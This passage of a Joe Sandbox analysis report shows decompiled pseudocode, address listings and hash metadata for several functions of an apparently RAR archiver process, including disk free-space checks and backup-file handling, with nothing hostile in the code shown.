				if ((_t127 & 0x00000002) == 0) goto 0x50b52058;
				_t66 = _t306 + 0x6f; // 0x7c8
				_t322 = _t66;
				r8d = _t170;
				_t67 = _t306 - 0x39; // 0x720
				r8d = r8d -  *((intOrPtr*)(_t306 - 0x39));
				r8d =  >  ? 0xa : r8d;
				r8d = r8d +  *((intOrPtr*)(_t306 - 0x39));
				_t129 = E00007FF67FF650B48C68(_t219, _t236, _t333, _t67, _t295, _t322, _t324, _t299);
				 *(_t306 - 0x29) = _t219;
				if ( *((char*)(_t306 + 0x6f)) != 0) goto 0x50b52072;
				if (_t129 != 1) goto 0x50b5208f;
				if ( *((char*)(_t306 + 0x77)) != 0) goto 0x50b52072;
				 *((char*)(_t306 + 0x77)) = _t129;
				goto 0x50b52129;
				_t171 =  *((intOrPtr*)(_t306 - 0x35));
				r14d =  *((intOrPtr*)(_t306 - 0x1d));
				r13d = r13d + 1;
				r8d =  *((intOrPtr*)(_t306 - 0x31));
				r14d = r14d - 1;
				r8d = r8d + 1;
				goto 0x50b51ea5;
				_t154 =  *((intOrPtr*)(_t306 + 0x7f));
				 *((char*)(_t306 + 0x77)) = _t154;
				if (_t129 != 2) goto 0x50b52129;
				 *((char*)(_t306 + 0x77)) = _t154;
				if (_t154 != 0) goto 0x50b520cd;
				_t130 = E00007FF67FF650B5CE9C( *((intOrPtr*)(_t306 - 0x31)), _t171, _t154,  *((intOrPtr*)(_t306 - 0x11)) + 1, _t236, _t333, _t295, _t213, _t322);
				r9d = 0;
				 *((char*)(_t326 + 0x7f7c)) = _t130;
				r8d = 0;
				 *((char*)(_t309 + 0x20)) = 0;
				_t84 = _t322 + 1; // 0x1
				E00007FF67FF650B1B4D8(_t84,  *((intOrPtr*)(_t306 - 0x11)) + 1, _t326, _t67,  *(_t306 - 9), __r10, _t324);
				 *((char*)(_t306 + 0x77)) = 1;
				r8d = 0;
				 *(_t306 - 0x2d) =  *(_t306 - 0x2d) + 1;
				 *0x50b80550();
				E00007FF67FF650B1E5A8(_t236, _t295, _t300);
				if ( *((intOrPtr*)( *_t236 + 0x20)) == 0) goto 0x50b52129;
				if ( *((intOrPtr*)(_t236 + 0x22ec)) != 2) goto 0x50b52129;
				if ( *((char*)( *((intOrPtr*)(_t306 + 0x67)) + 0x7157)) != 0) goto 0x50b52129;
				_t92 = _t236 + 0x3540; // 0x3d50
				E00007FF67FF650B111C0(0x73, _t92);
				E00007FF67FF650B283F0(L"     ", _t92,  *(_t306 - 9), _t322, _t235);
				r14d = r14d - r13d;
				r14d = r14d +  *(_t306 - 9);
				r8d = r14d;
				E00007FF67FF650B329C4(_t146, _t84, __ebp,  *((intOrPtr*)(_t306 + 0x67)), _t236, _t326, r13d + _t333,  *(_t306 - 9));
				if ( *(_t306 - 0x29) == 0) goto 0x50b52180;
				r8d = 0;
				 *0x50b80550();
				E00007FF67FF650B31D58( *((intOrPtr*)( *_t236 + 0x20)), _t236, _t236, _t326, _t306,  *(_t306 - 0x29));
				goto 0x50b52180;
				E00007FF67FF650B52FB8(_t146, _t236, _t236, _t300 + _t326 +  *(_t306 - 0x29) + r13d,  *((intOrPtr*)(_t306 + 7)));
				r8d = 0;
				 *0x50b80550();
				r8d = 0x1000000;
				_t141 =  *0x50b80550();
				r14b =  *((intOrPtr*)(_t306 + 0x77));
				 *((intOrPtr*)(_t306 - 0x35)) = _t171;
				if (_t141 - 7 >= 0) goto 0x50b51e94;
				r13d =  *(_t306 - 0x2d);
				0x50b69b94();
				r8d = 0x64;
				E00007FF67FF650B52FB8(_t146, _t236, _t236, _t333,  *((intOrPtr*)(_t306 + 7)));
				if (r13d != 0) goto 0x50b52212;
				_t103 = _t236 + 0x3a; // 0x84a
				_t104 = _t328 + 0x41; // 0x41
				_t143 = E00007FF67FF650B111C0(_t104, _t103);
				_t105 = _t328 + 0xa; // 0xa
				E00007FF67FF650B2CC24(_t143, _t105, r13d, 0x50ba7ab8);
				goto 0x50b52223;
				return  *0x50b80550();
			}










































                                                                                                            0x7ff650b51d64
                                                                                                            0x7ff650b51d64
                                                                                                            0x7ff650b51d64
                                                                                                            0x7ff650b51d64
                                                                                                            0x7ff650b51d64
                                                                                                            0x7ff650b51d75
                                                                                                            0x7ff650b51d75
                                                                                                            0x7ff650b51d7a
                                                                                                            0x7ff650b51d84
                                                                                                            0x7ff650b51d8b
                                                                                                            0x7ff650b51d8e
                                                                                                            0x7ff650b51d99
                                                                                                            0x7ff650b51da3
                                                                                                            0x7ff650b51da9
                                                                                                            0x7ff650b51da9
                                                                                                            0x7ff650b51daf
                                                                                                            0x7ff650b51dbe
                                                                                                            0x7ff650b51dc3
                                                                                                            0x7ff650b51dcb
                                                                                                            0x7ff650b51dcf
                                                                                                            0x7ff650b51dd5
                                                                                                            0x7ff650b51dd8
                                                                                                            0x7ff650b51de0
                                                                                                            0x7ff650b51de3
                                                                                                            0x7ff650b51ded
                                                                                                            0x7ff650b51df7
                                                                                                            0x7ff650b51dff
                                                                                                            0x7ff650b51e02
                                                                                                            0x7ff650b51e05
                                                                                                            0x7ff650b51e08
                                                                                                            0x7ff650b51e0c
                                                                                                            0x7ff650b51e10
                                                                                                            0x7ff650b51e17
                                                                                                            0x7ff650b51e1b
                                                                                                            0x7ff650b51e24
                                                                                                            0x7ff650b51e27
                                                                                                            0x7ff650b51e2e
                                                                                                            0x7ff650b51e42
                                                                                                            0x7ff650b51e50
                                                                                                            0x7ff650b51e58
                                                                                                            0x7ff650b51e65
                                                                                                            0x7ff650b51e6e
                                                                                                            0x7ff650b51e7e
                                                                                                            0x7ff650b51e84
                                                                                                            0x7ff650b51e87
                                                                                                            0x7ff650b51e8e
                                                                                                            0x7ff650b51e94
                                                                                                            0x7ff650b51e97
                                                                                                            0x7ff650b51e9e
                                                                                                            0x7ff650b51ea1
                                                                                                            0x7ff650b51ea1
                                                                                                            0x7ff650b51ea8
                                                                                                            0x7ff650b51eaa
                                                                                                            0x7ff650b51eae
                                                                                                            0x7ff650b51eb2
                                                                                                            0x7ff650b51eb6
                                                                                                            0x7ff650b51ebf
                                                                                                            0x7ff650b51ec1
                                                                                                            0x7ff650b51ec6
                                                                                                            0x7ff650b51eca
                                                                                                            0x7ff650b51ed2
                                                                                                            0x7ff650b51ede
                                                                                                            0x7ff650b51ee7
                                                                                                            0x7ff650b51eef
                                                                                                            0x7ff650b51ef3
                                                                                                            0x7ff650b51ef7
                                                                                                            0x7ff650b51efb
                                                                                                            0x7ff650b51eff
                                                                                                            0x7ff650b51f05
                                                                                                            0x7ff650b51f0a
                                                                                                            0x7ff650b51f0e
                                                                                                            0x7ff650b51f14
                                                                                                            0x7ff650b51f1b
                                                                                                            0x7ff650b51f22
                                                                                                            0x7ff650b51f25
                                                                                                            0x7ff650b51f2f
                                                                                                            0x7ff650b51f38
                                                                                                            0x7ff650b51f41
                                                                                                            0x7ff650b51f4c
                                                                                                            0x7ff650b51f57
                                                                                                            0x7ff650b51f5e
                                                                                                            0x7ff650b51f65
                                                                                                            0x7ff650b51f69
                                                                                                            0x7ff650b51f6c
                                                                                                            0x7ff650b51f71
                                                                                                            0x7ff650b51f78
                                                                                                            0x7ff650b51f7c
                                                                                                            0x7ff650b51f85
                                                                                                            0x7ff650b51f8b
                                                                                                            0x7ff650b51f91
                                                                                                            0x7ff650b51fa1
                                                                                                            0x7ff650b51fb2
                                                                                                            0x7ff650b51fbd
                                                                                                            0x7ff650b51fc3
                                                                                                            0x7ff650b51fca
                                                                                                            0x7ff650b51fcd
                                                                                                            0x7ff650b51fd0
                                                                                                            0x7ff650b51fd3
                                                                                                            0x7ff650b51fdc
                                                                                                            0x7ff650b51fdf
                                                                                                            0x7ff650b51fe3
                                                                                                            0x7ff650b51feb
                                                                                                            0x7ff650b51ff2
                                                                                                            0x7ff650b51ff6
                                                                                                            0x7ff650b51ff9
                                                                                                            0x7ff650b51ffd
                                                                                                            0x7ff650b52007
                                                                                                            0x7ff650b5200b
                                                                                                            0x7ff650b5200f
                                                                                                            0x7ff650b52018
                                                                                                            0x7ff650b5201a
                                                                                                            0x7ff650b5201e
                                                                                                            0x7ff650b52025
                                                                                                            0x7ff650b5202c
                                                                                                            0x7ff650b5202c
                                                                                                            0x7ff650b52030
                                                                                                            0x7ff650b52033
                                                                                                            0x7ff650b52037
                                                                                                            0x7ff650b52041
                                                                                                            0x7ff650b52045
                                                                                                            0x7ff650b52049
                                                                                                            0x7ff650b52052
                                                                                                            0x7ff650b52056
                                                                                                            0x7ff650b5205f
                                                                                                            0x7ff650b52065
                                                                                                            0x7ff650b52067
                                                                                                            0x7ff650b5206a
                                                                                                            0x7ff650b5206f
                                                                                                            0x7ff650b52072
                                                                                                            0x7ff650b52076
                                                                                                            0x7ff650b52079
                                                                                                            0x7ff650b5207d
                                                                                                            0x7ff650b52084
                                                                                                            0x7ff650b5208a
                                                                                                            0x7ff650b5208f
                                                                                                            0x7ff650b52092
                                                                                                            0x7ff650b52098
                                                                                                            0x7ff650b5209e
                                                                                                            0x7ff650b520a3
                                                                                                            0x7ff650b520a5
                                                                                                            0x7ff650b520aa
                                                                                                            0x7ff650b520ad
                                                                                                            0x7ff650b520b5
                                                                                                            0x7ff650b520b8
                                                                                                            0x7ff650b520c0
                                                                                                            0x7ff650b520c4
                                                                                                            0x7ff650b520c9
                                                                                                            0x7ff650b520d0
                                                                                                            0x7ff650b520d3
                                                                                                            0x7ff650b520e3
                                                                                                            0x7ff650b520ec
                                                                                                            0x7ff650b520f4
                                                                                                            0x7ff650b520fd
                                                                                                            0x7ff650b5210a
                                                                                                            0x7ff650b5210c
                                                                                                            0x7ff650b52118
                                                                                                            0x7ff650b52124
                                                                                                            0x7ff650b52129
                                                                                                            0x7ff650b5212f
                                                                                                            0x7ff650b52136
                                                                                                            0x7ff650b5213c
                                                                                                            0x7ff650b5214f
                                                                                                            0x7ff650b52154
                                                                                                            0x7ff650b52161
                                                                                                            0x7ff650b52170
                                                                                                            0x7ff650b52178
                                                                                                            0x7ff650b5218a
                                                                                                            0x7ff650b52192
                                                                                                            0x7ff650b5219f
                                                                                                            0x7ff650b521a8
                                                                                                            0x7ff650b521b8
                                                                                                            0x7ff650b521be
                                                                                                            0x7ff650b521c5
                                                                                                            0x7ff650b521cc
                                                                                                            0x7ff650b521d2
                                                                                                            0x7ff650b521d9
                                                                                                            0x7ff650b521e6
                                                                                                            0x7ff650b521e9
                                                                                                            0x7ff650b521f1
                                                                                                            0x7ff650b521f3
                                                                                                            0x7ff650b521f7
                                                                                                            0x7ff650b521fb
                                                                                                            0x7ff650b52200
                                                                                                            0x7ff650b5220b
                                                                                                            0x7ff650b52210
                                                                                                            0x7ff650b52236

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-829830573
                                                                                                            • Opcode ID: 6c852a65b7361fe8c8b9157f7ffa3dc7390a913ef02b484b231e8e948a9ca68e
                                                                                                            • Instruction ID: 0a3fa20fec135b587b7a3abd18cb706f896a90bf840bcea63158e2502595b9ea
                                                                                                            • Opcode Fuzzy Hash: 6c852a65b7361fe8c8b9157f7ffa3dc7390a913ef02b484b231e8e948a9ca68e
                                                                                                            • Instruction Fuzzy Hash: 7ED1D236F196539AFB10DF79D4846AD27A1BB46BC8F480031DE0EA3B99DE3AE405C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B468BC Relevance: 1.5, Strings: 1, Instructions: 293COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00007FF67FF650B468BC(void* __ecx, void* __edx, void* __ebp, void* __rcx, void* __rdi, void* __r8, void* __r9, void* __r10, void* __r11, char _a32) {
				intOrPtr _t5;
				void* _t15;
				void* _t16;
				void* _t23;

				_t22 = __rdi;
				_t10 = __edx;
				if (__edx == 0) goto 0x50b46907;
				_t5 =  *((intOrPtr*)(__rcx + 0x7f78));
				if (_t5 != 2) goto 0x50b468de;
				goto 0x50b46910;
				if (_t5 != 3) goto 0x50b46907;
				r8d = __edx;
				_t21 = __rcx;
				E00007FF67FF650B460D8(_t16,  &_a32, __rcx, __rdi, _t23, __r8, __r9);
				E00007FF67FF650B46238(_t10, __ebp, _t5 - 3, _t16,  &_a32, _t21, _t22, _t23, __r10, __r11);
				return E00007FF67FF650B45CB4(_t15, _t16,  &_a32, _t23);
			}







                                                                                                            0x7ff650b468bc
                                                                                                            0x7ff650b468bc
                                                                                                            0x7ff650b468c5
                                                                                                            0x7ff650b468c7
                                                                                                            0x7ff650b468d0
                                                                                                            0x7ff650b468d9
                                                                                                            0x7ff650b468e1
                                                                                                            0x7ff650b468e3
                                                                                                            0x7ff650b468e6
                                                                                                            0x7ff650b468ee
                                                                                                            0x7ff650b468f8
                                                                                                            0x7ff650b4690e

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: fflush
                                                                                                            • String ID: Protect+
                                                                                                            • API String ID: 497872470-528818647
                                                                                                            • Opcode ID: 505957e90fd3210c64afc2c84834c17b8d81384438cbdc687bbd6d053ca7788c
                                                                                                            • Instruction ID: 4739c53d88e5e5faef51b35232ddaab82eec55e6d52523aad623617ca1ed055f
                                                                                                            • Opcode Fuzzy Hash: 505957e90fd3210c64afc2c84834c17b8d81384438cbdc687bbd6d053ca7788c
                                                                                                            • Instruction Fuzzy Hash: EFC1B332B18A82A2EB14DB25D5C02BD6762FB9ABC0F445032DE4EA7BA5DF3DD515C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B33548 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00007FF67FF650B33548(void* __rax, void* __rcx, signed int _a32, signed int _a36, void* _a40, intOrPtr _a44, void* _a48, char _a64, signed int _a4160) {
				signed long long _t30;
				void* _t35;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t47;
				void* _t50;
				void* _t51;

				E00007FF67FF650B69CB0(0x1058, __rax, _t50, _t51);
				_t30 =  *0x50b978f0; // 0x27db226282f1
				_a4160 = _t30 ^ _t44 - __rax;
				r8d = 0x800;
				E00007FF67FF650B44354(_t30 ^ _t44 - __rax, _t35, __rcx,  &_a64, _t42, _t43, _t47);
				_a36 = _a36 & 0x00000000;
				_a32 = _a32 & 0x00000000;
				asm("dec eax");
				if (GetDiskFreeSpaceExW(??, ??, ??, ??) == 0) goto 0x50b335c4;
				if (_a36 - _a44 > 0) goto 0x50b335c4;
				goto 0x50b335c6;
				return E00007FF67FF650B69D10(0, _a32, _a4160 ^ _t44 - __rax);
			}











                                                                                                            0x7ff650b3354d
                                                                                                            0x7ff650b33555
                                                                                                            0x7ff650b3355f
                                                                                                            0x7ff650b33567
                                                                                                            0x7ff650b33572
                                                                                                            0x7ff650b33581
                                                                                                            0x7ff650b3358b
                                                                                                            0x7ff650b3359d
                                                                                                            0x7ff650b335ab
                                                                                                            0x7ff650b335b5
                                                                                                            0x7ff650b335c2
                                                                                                            0x7ff650b335dd

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1705453755-0
                                                                                                            • Opcode ID: 1903f04013078c90a25d546bf241272c0d52d738f957ed87bc20faf40cfdfac2
                                                                                                            • Instruction ID: 6c59336150406c54ff35dea9b29e8144d1c04d9cd5c6c7901e62d173a7238668
                                                                                                            • Opcode Fuzzy Hash: 1903f04013078c90a25d546bf241272c0d52d738f957ed87bc20faf40cfdfac2
                                                                                                            • Instruction Fuzzy Hash: F1012D626286C297EB70DB15E0817EA73A0FB89749F580531E68E96688DF3DD644CF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1A464 Relevance: 1.5, Strings: 1, Instructions: 281COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 57%
                                                                                                            			E00007FF67FF650B1A464(void* __ecx, void* __eflags, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				char _t62;
				intOrPtr _t72;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t111;
				void* _t126;
				void* _t127;
				signed long long _t163;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t179;
				void* _t256;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;
				void* _t262;
				void* _t265;
				signed long long _t266;
				void* _t268;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t280;
				void* _t283;

				_t271 = __r9;
				_t268 = __r8;
				_t233 = __rdx;
				_t178 = __rbx;
				_t115 = __ecx;
				 *((long long*)(_t265 + 0x18)) = __rbx;
				_t263 = _t265 - 0x3f80;
				E00007FF67FF650B69CB0(0x4080, __rax, _t272, _t273);
				_t266 = _t265 - __rax;
				_t163 =  *0x50b978f0; // 0x27db226282f1
				 *(_t265 - 0x3f80 + 0x3f70) = _t163 ^ _t266;
				_t260 = __rdx;
				_t257 = __rcx;
				if (E00007FF67FF650B18144(__rdx) != 0) goto 0x50b1a8a8;
				_t62 =  *((intOrPtr*)(_t260 + 0x7f7d));
				 *((char*)(_t257 + 0x7f7d)) = _t62;
				if (_t62 == 0) goto 0x50b1a4cc;
				 *((intOrPtr*)(_t257 + 0x7fa4)) =  *((intOrPtr*)(_t260 + 0x7fa4));
				E00007FF67FF650B47D78(_t111, __ecx, _t127, __rbx, _t257 + 0x2310, _t233, _t260, _t265 - 0x3f80, _t272, _t273, _t283, _t280);
				E00007FF67FF650B468BC(__ecx,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x714c)), _t127, _t257, _t257, _t268, _t271, _t272, _t273);
				if ( *((char*)(_t260 + 0x7f7d)) == 0) goto 0x50b1a503;
				if ( *((char*)(_t260 + 0x585c)) == 0) goto 0x50b1a503;
				goto 0x50b1a505;
				E00007FF67FF650B1C040(__ecx, 0,  *((intOrPtr*)(_t257 + 0x22d8)), _t178, _t257, _t260, _t265 - 0x3f80, _t271, _t273, _t276, _t274, _t256);
				_t281 = _t260 + 0x3a;
				E00007FF67FF650B186B4( *((intOrPtr*)(_t257 + 0x22d8)), _t178, _t260 + 0x3a, _t257 + 0x3a);
				 *(_t266 + 0x28) =  *(_t266 + 0x28) & 0x00000000;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x71b0)) != 1) goto 0x50b1a556;
				E00007FF67FF650B32164(_t260, _t266 + 0x28);
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B32760(_t257, _t266 + 0x28, _t268, _t271);
				_t167 =  *((intOrPtr*)(_t257 + 0x22d8));
				if ( *((intOrPtr*)(_t167 + 0x71b0)) != 2) goto 0x50b1a581;
				if ( *((long long*)(_t257 + 0x22e0)) == 0) goto 0x50b1a581;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B32760(_t257, _t257 + 0x22e0, _t268, _t271);
				r12d = E00007FF67FF650B443C4(_t260 + 0x3a);
				_t72 = E00007FF67FF650B443C4(_t257 + 0x3a);
				r13d = _t72;
				 *((intOrPtr*)(_t266 + 0x20)) = _t72;
				if (r12d == 0xffffffff) goto 0x50b1a5ff;
				if (r12d == _t72) goto 0x50b1a5ff;
				E00007FF67FF650B320B8(_t178, _t260, _t260, _t259);
				_t179 = _t167;
				E00007FF67FF650B320B8(_t179, _t257, _t260, _t262);
				_t278 = _t167 - _t179;
				if (_t278 <= 0) goto 0x50b1a5fa;
				E00007FF67FF650B33548(_t167, _t260 + 0x3a);
				if (_t278 - _t167 <= 0) goto 0x50b1a5fa;
				r8b = 1;
				if (E00007FF67FF650B2C84C(_t179, 0x50ba7ab8, _t260 + 0x3a, _t260) != 0) goto 0x50b1a5c4;
				E00007FF67FF650B2C930(5, E00007FF67FF650B2C84C(_t179, 0x50ba7ab8, _t260 + 0x3a, _t260), _t179, 0x50ba7ab8, _t281, _t268, _t271);
				goto 0x50b1a5c4;
				r13d =  *((intOrPtr*)(_t266 + 0x20));
				 *0x50b80550();
				_t171 =  *((intOrPtr*)( *_t260 + 0x10));
				 *0x50b80550();
				E00007FF67FF650B2CC68();
				r9d = r13d;
				r8d = r12d;
				if (E00007FF67FF650B19998(_t171, _t179, _t257, _t260) != 0) goto 0x50b1a81b;
				E00007FF67FF650B31C28(_t266 + 0x30);
				r8d = 9;
				if (E00007FF67FF650B321C0(_t171, _t179, _t266 + 0x30, _t281) == 0) goto 0x50b1a67a;
				if (E00007FF67FF650B31CF0(_t179, _t266 + 0x30) == 0) goto 0x50b1a67a;
				goto 0x50b1a67c;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t265 - 0x3f80 + 0x1f70, _t281, _t268);
				if (0 != 0) goto 0x50b1a70a;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t263 + 0x2f70, _t281, _t268);
				r8d = 0x800;
				E00007FF67FF650B5A390(_t263 + 0xf70, _t281, _t268);
				r8d = 0x800;
				E00007FF67FF650B451A8(_t171, _t179, _t263 + 0xf70, L"bak", _t260, _t268);
				E00007FF67FF650B338FC(_t115, _t179, _t263 + 0xf70, L"bak", _t271);
				if (_t171 == 0) goto 0x50b1a716;
				if (E00007FF67FF650B326B4(0x800, _t171, _t179, _t260, _t263 + 0xf70, _t260) == 0) goto 0x50b1a716;
				if (E00007FF67FF650B3345C() != 0) goto 0x50b1a716;
				if (E00007FF67FF650B31FB0(_t260) != 0) goto 0x50b1a73b;
				E00007FF67FF650B2CC68();
				E00007FF67FF650B31FB0(_t257);
				E00007FF67FF650B2CA8C(E00007FF67FF650B31FB0(_t260), _t179, 0x50ba7ab8, _t281, _t260);
				if (r12d == r13d) goto 0x50b1a74c;
				if (r12d == 0xffffffff) goto 0x50b1a74c;
				if (r13d != 0xffffffff) goto 0x50b1a763;
				if (E00007FF67FF650B33B2C(0x800, _t171, _t179, _t257 + 0x3a, _t263 + 0x1f70, _t260) != 0) goto 0x50b1a7fe;
				r8d = 0x11;
				E00007FF67FF650B32840();
				E00007FF67FF650B32864();
				E00007FF67FF650B31D58(_t171, _t179, _t257, _t260, _t263, 0x7fffffff);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x71b0)) != 1) goto 0x50b1a7bb;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B32760(_t260, _t266 + 0x28, 0x7fffffff, _t271);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x71b0)) != 2) goto 0x50b1a7e6;
				if ( *((long long*)(_t257 + 0x22e0)) == 0) goto 0x50b1a7e6;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B32760(_t260, _t257 + 0x22e0, 0x7fffffff, _t271);
				 *0x50b80550();
				E00007FF67FF650B31FB0(_t257);
				E00007FF67FF650B5A390(_t257 + 0x3a, _t263 + 0x1f70, _t179);
				_t103 = E00007FF67FF650B31C70(_t266 + 0x30);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x71b0)) != 1) goto 0x50b1a83b;
				r8d = 0;
				_t104 = E00007FF67FF650B2EE10(_t103);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x22d8)) + 0x71b0)) != 2) goto 0x50b1a863;
				if ( *((long long*)(_t257 + 0x22e0)) == 0) goto 0x50b1a863;
				r8d = 0;
				_t105 = E00007FF67FF650B2EE10(_t104);
				if ( *((long long*)(_t257 + 0x7f88)) <= 0) goto 0x50b1a875;
				E00007FF67FF650B2EE10(_t105);
				E00007FF67FF650B2CC68();
				if ( *((char*)(_t257 + 0x7f7f)) == 0) goto 0x50b1a89e;
				E00007FF67FF650B54598(0xd2a, _t126, _t179, _t260, _t263, _t179);
				E00007FF67FF650B283F0( *((intOrPtr*)(_t257 + 0x22d8)), _t257 + 0x22e0, _t179, _t271);
				return E00007FF67FF650B69D10(E00007FF67FF650B1AA50(1,  *((intOrPtr*)(_t257 + 0x22d8)), _t257), 0xd2a,  *(_t263 + 0x3f70) ^ _t266);
			}


































                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a464
                                                                                                            0x7ff650b1a474
                                                                                                            0x7ff650b1a481
                                                                                                            0x7ff650b1a486
                                                                                                            0x7ff650b1a489
                                                                                                            0x7ff650b1a493
                                                                                                            0x7ff650b1a49a
                                                                                                            0x7ff650b1a49d
                                                                                                            0x7ff650b1a4aa
                                                                                                            0x7ff650b1a4b0
                                                                                                            0x7ff650b1a4b6
                                                                                                            0x7ff650b1a4be
                                                                                                            0x7ff650b1a4c6
                                                                                                            0x7ff650b1a4d3
                                                                                                            0x7ff650b1a4e8
                                                                                                            0x7ff650b1a4f4
                                                                                                            0x7ff650b1a4fd
                                                                                                            0x7ff650b1a501
                                                                                                            0x7ff650b1a508
                                                                                                            0x7ff650b1a511
                                                                                                            0x7ff650b1a51b
                                                                                                            0x7ff650b1a520
                                                                                                            0x7ff650b1a534
